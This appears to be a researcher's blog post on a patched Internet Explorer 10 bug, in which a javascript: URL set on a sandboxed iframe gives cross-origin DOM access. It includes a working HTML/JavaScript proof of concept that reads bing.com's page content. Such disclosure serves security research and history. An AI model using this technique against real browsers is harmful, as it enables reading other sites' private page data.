IE10 UXSS: Sandbox Paradox — javascript: URL in Sandboxed iframe Gives Cross-Origin DOM Access

I found that loading a cross-origin URL inside a sandboxed iframe and then setting window[0].location to a javascript: URI gave the attacker script execution in the iframe’s context with access to the cross-origin document.body.outerHTML. The paradox is that sandboxing the iframe is what enables the bypass — without the sandbox attribute, the javascript: URL would have been blocked by the same-origin policy; with it, the origin check was apparently skipped.

<iframe sandbox="allow-scripts" src="http://www.bing.com" width="700" height="150"></iframe>
<script>
function main()
{
    window[0].location = "javascript:alert(document.URL + '\n\n' + document.body.outerHTML)";
}
</script>
<input type="button" onclick="main()" value="Access iFrame DOM" />

Setting the sandboxed iframe’s location to a javascript: URI caused the script to execute inside the iframe with access to document.body.outerHTML of the cross-origin page, reading its full DOM. This worked on IE10 Metro (Win8 Release Preview) but the same technique did not work across window.open targets — only for same-tab iframes.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE10: X-Frame-Options Header Bypassed via mhtml: Protocol in Sandboxed iframe] :: [IE10 Sandbox Bypass: Flash getURL with javascript: Target Reaches Sandboxed Window] >